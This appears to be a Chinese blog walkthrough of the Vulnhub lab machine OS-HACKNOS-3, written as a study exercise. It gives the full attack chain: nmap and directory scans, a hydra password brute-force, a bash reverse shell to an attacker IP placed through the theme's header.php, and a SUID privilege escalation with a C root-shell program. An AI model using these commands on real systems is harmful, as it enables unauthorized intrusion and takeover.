2022年1月10日03:33:48评论100 views字数 1187阅读3分57秒阅读模式

前言

Vulnhub刷题简单记录

OS-HACKNOS-3

描述

难度：中级

Flag: 2 标记第一个用户和第二个根用户

学习：Web 应用程序 | 枚举 | 权限提升

网址：www.hacknos.com

https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/

OS-HACKNOS-3

1、可以用两种方法确认靶场的存在，扫ip

1 2	netdiscover -i eth0 -r 192.168.1.0/24 nmap -sn 192.168.1.0/24

2、扫目标端口开发情况

1
2
3

nmap -p- -T5 192.168.56.102 #全端口扫描
nmap -sV -sC -p 22,25,80,110 -A  192.168.56.102 -o h-3
nmap -p- -A 192.168.56.102 -T5 -oA h-3

3、访问主页，根据提示说有一个password_resets，我们扫一下目录情况

gobuster dir -u http://192.168.56.102/websec -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 --wildcard | grep -v 4647

dirb http://192.168.1.102/

dirsearch -u 192.168.136.150 -e*  -x 403

4、爬取页面的关键词，页面也收集到邮箱[email protected]

1	cewl http://192.168.56.102/websec/ > cewl.txt

5、接着用hydra爆破页面

1	hydra -l [email protected] -P cewl.txt 192.168.56.102 http-post-form "/websec/admin:username=^USER^&password=^PASS^:Wrong email" -V

6、进入管理员后台，经典的theme改header.php来直接命令执行和反弹shell

1	bash -c 'exec bash -i &>/dev/tcp/192.168.56.1/1234 0>&1'

5、利用suid提权

1 2	find / -type f -perm -u=s 2>/dev/null /usr/bin/cpulimit

6、用c语言写个root权限执行bin/sh

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc,char *argv[])
{
	setreuid(0,0);
	execve("/bin/bash",NULL,NULL);
}

我的个人博客

孤桜懶契：http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

【Vulnhub】靶机OS-HACKNOS-3

前言

OS-HACKNOS-3

描述

OS-HACKNOS-3

我的个人博客

孤桜懶契：http://gylq.gitee.io

综述合辑 | 《网络空间安全科学学报》综述论文（上）

通达OA 任意用户登录漏洞

Weblogic IIOP 反序列化漏洞学习笔记(CVE-2020-2551)

Python 定制QQ机器人

RocketMQ 5.1.1写计划任务RCE

Nacos Raft Hessian反序列化漏洞分析

Tabby学习笔记 & Java反序列化gadget分析

Apache Jena 代码执行漏洞(CVE-2023-22665)

Apache Archiva 任意目录删除(CVE-2022-40309) 和任意文件读取(CVE-2022-40308)

用CodeQL分析漏洞_CVE-2022-42889

发表评论

在线咨询

微信